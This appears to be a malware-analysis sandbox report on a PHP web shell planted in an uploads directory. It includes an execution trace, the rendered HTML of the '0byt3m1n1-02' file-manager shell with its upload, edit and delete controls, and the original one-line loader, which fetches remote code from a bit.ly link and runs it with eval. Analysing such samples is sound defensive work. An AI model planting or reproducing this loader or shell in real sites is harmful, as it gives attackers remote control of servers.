3 A /var/www/html/uploads/oh.php(1) : eval()'d code 224 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 225 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 226 $info .= 'x'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 227 $info .= 'r'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 228 $info .= '-'
3 A /var/www/html/uploads/oh.php(1) : eval()'d code 229 $info .= 'x'
3 56 1 0.203401 468344
3 56 R '-rwxr-xr-x'
3 58 0 0.203415 468304 is_writable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/prepend.php'
3 58 1 0.203431 468344
3 58 R FALSE
3 59 0 0.203443 468304 is_readable 0 /var/www/html/uploads/oh.php(1) : eval()'d code 194 1 '/var/www/html/uploads/prepend.php'
3 59 1 0.203458 468344
3 59 R TRUE
3 60 0 0.203471 468304 filemtime 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 1 '/var/www/html/uploads/prepend.php'
3 60 1 0.203485 468344
3 60 R 1676251797
3 61 0 0.203497 468240 date 0 /var/www/html/uploads/oh.php(1) : eval()'d code 196 2 'd-M-Y H:i' 1676251797
3 61 1 0.203527 468568
3 61 R '12-Feb-2023 20:29'
2 5 1 0.203544 468240
2 5 R NULL
1 3 1 0.203561 426088
0.203588 343712
TRACE END [2023-02-12 23:30:23.835696]
Generated HTML code
<html><head>
<style>
@import url(https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap);
body {
background: url(https://i.imgur.com/J5cDUtx.png) no-repeat center center fixed;
background-size: cover;
color:white;
font-family: "Balsamiq Sans", cursive;
margin:0;
font-size: 14px;
}
h1 {
font-family:"Balsamiq Sans", cursive;
font-size:50px;
margin:0;
color:#FF1493;
}
h1:hover {
color:#FF69B4;
}
select {
background:white;
color:black;
}
a {
color:#FF1493;
text-decoration:none;
font-family:"Balsamiq Sans", cursive;
}
textarea {
width:700px;
height:300px;
background:#FFB6C1;
border:2px solid black;
color:black;
padding:5px;
}
tr:hover {
background: #FFC0CB; }
th {
background:transparent;
padding:3px; }
</style>
<meta name="robots" content"noindex.="" nofollow"="">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<title>0byt3m1n1-02</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body><div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1-02</center></h1></div><iframe width="100%" height="20" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&color=%23ff1493&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe><hr color="FF1493" style="margin-top:0;width:99%"><table width="100%" border="0" align="center" style="margin-top:0px;"><tbody><tr><td><font color="#FF1493" style="font-size:14px;">Theme By xRyukZ.<br><font style="font-size:14px;">Path: <a style="font-size:14px;" href="?path="></a>/<a style="font-size:14px;" href="?path=/var">var</a>/<a style="font-size:14px;" href="?path=/var/www">www</a>/<a style="font-size:14px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></font></td><td align="center" width="30%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:10px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"><hr color="FF1493" style="margin-top:0;width:99%;"></td></tr></tbody></table><br><center></center><div id="content"><table width="80%" border="0" cellpadding="4" cellspacing="2" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="20%"><center>Permissions</center></th> <th width="20%"><center>Last Update</center></th><th width="11%"><center>Actions</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 20:29</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value=">"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/oh.php&path=/var/www/html">oh.php</a></td><td><center>0.06 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 20:29</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="oh.php"><input type="hidden" name="path" value="/var/www/html/oh.php"><input type="submit" value=">"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"><a href="http://zerobyte.id/">ZeroByte.ID</a></span> 2020.</center><br><script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script></body></html>Original PHP code
<?=eval("?>".file_get_contents("https://bit.ly/3jhOwIp"));?>